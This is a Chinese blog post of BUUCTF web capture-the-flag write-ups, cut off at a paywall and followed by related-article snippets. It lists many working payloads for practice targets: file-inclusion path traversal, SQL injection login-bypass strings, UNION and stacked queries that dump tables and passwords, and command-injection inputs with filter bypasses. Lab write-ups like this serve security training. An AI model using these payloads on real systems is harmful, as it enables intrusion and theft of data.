BUUCTF-WEB

最新推荐文章于 2025-06-05 19:03:21 发布
原创 最新推荐文章于 2025-06-05 19:03:21 发布 · 4.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #php #web安全

本文主要总结了多个CTF比赛中的Web挑战,包括SQL注入、文件上传、HTTP头利用、源码泄露等多个方面,涉及多种解题技巧和绕过方法,如万能密码、堆叠注入、文件包含、反序列化等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

持续更新中~~~~

目录

[HCTF 2018]WarmUp

[极客大挑战 2019]EasySQL

总结万能密码

[极客大挑战 2019]Havefun

[强网杯 2019]随便注

[ACTF2020 新生赛]Include

[SUCTF 2019]EasySQL

[极客大挑战 2019]Secret File

[ACTF2020 新生赛]Exec

[极客大挑战 2019]LoveSQL

[GXYCTF2019]Ping Ping Ping

[极客大挑战 2019]Knife

[极客大挑战 2019]Http

[极客大挑战 2019]Upload

[RoarCTF 2019]Easy Calc

[ACTF2020 新生赛]Upload

[极客大挑战 2019]PHP

[极客大挑战 2019]BabySQL

[ACTF2020 新生赛]BackupFile

[极客大挑战 2019]BuyFlag

[HCTF 2018]admin

[BJDCTF2020]Easy MD5

[ZJCTF 2019]NiZhuanSiWei

[SUCTF 2019]CheckIn

[极客大挑战 2019]HardSQL

[MRCTF2020]你传你🐎呢

[MRCTF2020]Ez_bypass

[网鼎杯 2020 青龙组]AreUSerialz

[CISCN2019 华北赛区 Day2 Web1]Hack World

[GYCTF2020]Blacklist

[网鼎杯 2018]Fakebook

[GXYCTF2019]BabyUpload

[BUUCTF 2018]Online Tool

[BJDCTF2020]The mystery of ip

[GXYCTF2019]禁止套娃

 

[HCTF 2018]WarmUp

打开网页,查看一下源代码,可以找到一个source.php

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
​
            if (in_array($page, $whitelist)) {
                return true;
            }
​
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
​
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
​
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

然后有一个hint.php

payload:

url/?file=source.php?../../../../ffffllllaaaagggg

[极客大挑战 2019]EasySQL

打开是一个登录界面,我们直接尝试万能密码

直接得到flag

总结万能密码

asp aspx万能密码

1:"or "a"="a
2:'.).or.('.a.'='.a 
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or.'a.'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
admin'or 1=1#

PHP万能密码

admin'/*
密码*/'
​
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
'or''=''or''='
'or'='1'
'or'='or'
'or.'a.'='a
'or1=1--
1'or'1'='1
a'or' 1=1--
a'or'1=1--
or 'a'='a'
or 1=1--
or1=1--

jsp万能密码

1'or'1'='1
​
admin' or 1=1/*

[极客大挑战 2019]Havefun

打开网页,就是一个小猫,然后我们F12查看一下源代码,找到了一行注释

$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';}

在这里有一个迷惑,Syc{cat_cat_cat_cat}虽然很像flag,但是不是flag

然后我们可以直接get传参cat=dog

[强网杯 2019]随便注

上来就是sql注入,然后我们直接

1‘ select union 2#

然后我们知道了select被禁用了

然后我们采用堆叠注入show tables

';show tables;#

再查字段

‘;show columns from words;#
‘;show columns from 1919810931114514;#

最后发现查最后的flag这个方法行不通呐,看了别人的wp也没有学明白

最后找到了非预期解,直接得flag

1' or 1=1#

[ACTF2020 新生赛]Include

打开是一个tips,然后点击转到了?file=flag.php页面

但是并没有什么东西,然后我们想到了题目include,直接伪协议读flag.php得到了源码

解码得flag

[SUCTF 2019]EasySQL

试了好多

输入1,有回显
输入2,也有回显
但是1’,没有回显了
尝试用order by语句查询多少个字段

然后我直接看了别人的wp,受益匪浅

内置的sql语句为:

sql=“select”.post[‘query’]."||flag from Flag";

如果$post['query']的数据为*,1,sql语句就变成了

select *,1||flag from Flag

也就是

select *,1 from Flag

查到Flag表中的内容

[极客大挑战 2019]Secret File

打开网页只发现了页面为黑色,字体为红色

很容易就找到了线索,来到./Archive_room.php页面

点击这个secret按钮,首先到了action页面,但是特别快的准到end页面,没有看清里面的内容

然后我们抓包看一下

又找到了secr3t.php

然后我们直接用伪协议读flag.php,得到base64编码,然后解码

[ACTF2020 新生赛]Exec

这个题直接127.0.01来查询就行了

127.0.0.1;ls /
127.0.0.1;cat /flag

[极客大挑战 2019]LoveSQL

进来就是一个登录页面,然后我们直接尝试万能密码登录

发现并不对,但是我们找到了注入点

测试注入点

/check.php?username=1' union select 1,2,3%23&password=1

查询数据库及版本

/check.php?username=1' union select 1,database(),version()%23&password=1

爆表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

爆字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

爆数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

[GXYCTF2019]Ping Ping Ping

一进来就是让我们输ip,很明显传参

然后我尝试了以下

?ip=127.0.0.1//可行
?ip=127.0.0.1;ls//查到了flag
?ip=127.0.0.1;cat flag//被禁掉了空格
?ip=127.0.0.1;cat$IFS$flag//flag被禁了

我们直接?ip=1|cat$IFS$1index.php,查看以下index.php

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
​
";
  print_r($a);
}
​
?>

看到了好多被禁用的

关于flag的绕过

?ip
最低0.47元/天 解锁文章

200万优质内容无限畅学
parkour-
关注
BUUCTF——Web
2201_75331136的博客
07-11 1243
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2604
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF-web
qq_53086690的博客
05-26 351
[HCTF 2018]WarmUp 源码发现提示source.php审计PHP。发现有三个地方可以返回Ture但是只有后两个是可以的,所以考虑后两个。(第一个无法访问flag) 白名单,只有source.php和hint.php。 mb_substr() 返回字符串从第二个参数到第三个参数的值即str[0:2] mb_strpos() 查找到第一个含有第二个参数的位置。 可以构造payloadfile=hint.php?../../../../../ffffllllaaaagggg 第二个绕过 对第一
BUUCTF——Web1
weixin_71914594的博客
05-21 381
BUUCTF——Web1
BUUCTF--web
zhhhb1005的博客
04-10 1600
目录 [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [极客大挑战 2019]EasySQL 打开题目发现需要输入用户名和密码,因为刚刚看了万能密码,所以可以尝试使用万能密码绕过,得出flag。 [极客大挑战 2019]Havefun 点击网页进去以后发现是一只小猫,没有任何线索,所以就可以考虑查看源代码,发现一段php语句,是一个简单的get传值。 .
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-Web-[MRCTF2020]你传你马呢
m0_61851859的博客
04-03 996
3.考虑是不是对php进行过滤,尝试黑名单绕过,将文件后缀修改为.phtml等一些后缀名发现上传失败。4.将文件类型修改为.jpg类型尝试上传并启用burpsuite抓包发现是可以成功上传的。一个.htaccess文件去把.jpg解析成.php。把content-type改成image/jpeg。1.打开题目发现文件上传位置,猜测为文件上传漏洞。7.拼接url使用蚁剑连接,成功找到flag。2.尝试上传一句话木马,上传失败。
BUUCTF-WEB-[GXYCTF2019]BabySQli
最新发布
xvsf的博客
06-05 1603
BUUCTF-WEB-[GXYCTF2019]BabySQli-wp
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 645
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF WEB
qq_43633585的博客
09-28 509
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
BUUCTF web
qq_40026795的博客
06-20 341
一、打开靶机页面是一个滑稽图片,查看一下源代码,得到提示source.php 二、访问source.php可以看到高亮源码,搜索相应内容,是CVE-2018-12613 PhpMyadmin后台文件包含漏洞的简化版本 针对关键代码分析如下: (1)白名单验证,三次验证,任何一次通过即视为通过。 (2)第一次验证,在白名单里通过。这里可以看到hint.php也在白名单,访问得到提示ffffl...
buuctf web
gudugeji的博客
04-24 398
1.warmup 查看源码 2.随便注 堆叠注入 爆数据库 爆表,有两个表 构造playload:http://6d5326a4-99c2-423f-ab6f-46b44dc1853d.node3.buuoj.cn/?inject=1nject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435...
BUUCTF WEB 1
weixin_45689999的博客
04-06 574
easy_sql 题目提示是简单sql注入,可以先试试过滤了什么 1’ or ‘1’=‘1# 1’ and 1=1# 没有报错,证明or,and和#都没有被过滤 2)爆字段数 1’order by 2# 1’order by 3#报错 3)爆库 1’ union select database()# 返回return preg_match("/select|update|delete|drop|...
BUUCTF web(一)
热门推荐
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
BUUCTF web(一)
m0_46616663的博客
10-19 2123
[强网杯 2019]随便注 方法一 查询的过程中发现有过滤 尝试以下报错注入,用到了extractvalue() 简单讲一下extractvalue()。语法:extractvalue(目标xml文档,xml路径),路径为/xx/xx/…,如果路径非法就会报错并且返回非法内容,所以我们正可以借此查询到目标内容,用concat()拼接‘/’也是一样的,但是拼接‘~’就不合法了: 1’ and extractvalue(1,concat(’~’,database()))# 最长32位哈,超过32用subst
buuctf-web
01-05
### BUUCTF Web 安全挑战及相关资源 #### 平台概述 BUUCTF 是一个面向全球的安全爱好者和技术人员提供在线解题平台,旨在通过实际操作提升参与者的网络安全技能[^2]。 #### Web 安全挑战特点 该平台上设有专门针对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值